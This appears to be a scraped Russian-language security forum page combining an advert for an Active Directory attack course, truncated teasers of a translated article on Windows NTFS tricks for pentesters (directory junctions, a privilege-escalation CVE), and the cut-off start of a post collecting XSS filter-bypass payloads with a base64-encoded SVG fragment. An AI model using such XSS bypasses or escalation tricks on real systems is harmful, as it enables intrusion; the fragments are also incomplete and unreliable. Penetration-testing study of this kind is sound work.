🔍 Изучите реальные техники атак на инфраструктуру Active Directory: от первоначального доступа до полной компрометации.
🛠️ Освойте инструменты, такие как BloodHound, Mimikatz, CrackMapExec и другие.
🧪 Пройдите практические лабораторные работы, имитирующие реальные сценарии атак.
🧠 Получите знания, которые помогут вам стать востребованным специалистом в области информационной безопасности.
ТРЮК 4: "СКРЫТЬ" НАЗНАЧЕНИЕ DIRECTORY JUNCTIONS
*Что это такое?:
Directory junctions очень полезны для атакующих. С его помощью можно создать (с обычными правами пользователя) символическую ссылку на папку.
На мой взгляд, лучшая уязвимость в безопасности для объяснения directory junctions -...
Я не являюсь автором статьи, только перевел, источник:
https://www.sec-consult.com/en/blog/2018/06/pentesters-windows-ntfs-tricks-collection/
ТРЮК 1: СОЗДАНИЕ ПАПКОК БЕЗ РАЗРЕШЕНИЙ (CVE-2018-1036/NTFS EOP)
В Windows, вы можете назначить “специальные разрешения” для папок, как разрешения, что...
Решил некоторые байпассы XSS фильтров собрать. И предлагаю дополнять эту тему.
Payload #1:
<svg xml:base="data:image/svg+xml;base64,
PHN2ZyBpZD0icmVjdGFuZ2xlIiB4bWxucz0iaHR0cD
ovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhs
aW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW...
На данном сайте используются cookie-файлы, чтобы персонализировать контент и сохранить Ваш вход в систему, если Вы зарегистрируетесь.
Продолжая использовать этот сайт, Вы соглашаетесь на использование наших cookie-файлов.